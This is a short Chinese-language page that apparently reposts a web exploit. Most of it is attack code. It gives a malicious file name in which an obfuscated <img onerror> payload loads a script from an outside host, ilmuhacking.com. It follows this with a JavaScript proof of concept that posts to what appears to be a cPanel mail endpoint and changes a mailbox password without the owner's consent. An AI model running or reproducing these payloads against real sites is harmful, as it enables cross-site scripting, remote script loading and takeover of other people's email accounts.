恶意文件名:
<img src=\'\' onerror=\'document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,105,108,109,117,104,97,99,107,105,110,103,46,99, 111,109,47,120,46,106,115,62,60,47,115,99,114,105,112,116,62))\'>
该<img>生成以下html标签,以导致浏览器加载并执行外部脚本:
<script src=http://ilmuhacking.com/x.js></script>
PoC负载:
----------------
var http_request = false;
function makePOSTRequest(url, parameters) {
http_request = false;
if (window.XMLHttpRequest) { // Mozilla, Safari,...
http_request = new XMLHttpRequest();
if (http_request.overrideMimeType) {
http_request.overrideMimeType(\'text/html\');
}
} else if (window.ActiveXObject) { // IE
try {
http_request = new ActiveXObject(\"Msxml2.XMLHTTP\");
} catch (e) {
try {
http_request = new ActiveXObject(\"Microsoft.XMLHTTP\");
} catch (e) {}
}
}
if (!http_request) {
alert(\'Cannot create XMLHTTP instance\');
return false;
}
http_request.onreadystatechange = alertContents;
http_request.open(\'POST\', url, true);
http_request.setRequestHeader(\"Content-type\", \"application/x-www-form-urlencoded\");
http_request.setRequestHeader(\"Content-length\", parameters.length);
http_request.setRequestHeader(\"Connection\", \"close\");
http_request.send(parameters);
}
function alertContents() {
if (http_request.readyState == 4) {
if (http_request.status == 200) {
result = http_request.responseText;
alert(result);
} else {
alert(\'There was a problem with the request.\');
}
}
}
var poststr = \"quota=\" + encodeURI(\"250\") + \"&password2=\" + encodeURI(\"newpassword\") \\
+
\"&password=\" + encodeURI(\"newpassword\") + \"&email=\" + encodeURI(\"testemail\") +
\"&domain=\" + encodeURI(\"ilmuhacking.com\");
makePOSTRequest(\'/frontend/x3/mail/dopasswdpop.html\', poststr);
共 2 兑换了
京公网安备 11010502034610号
暂无评论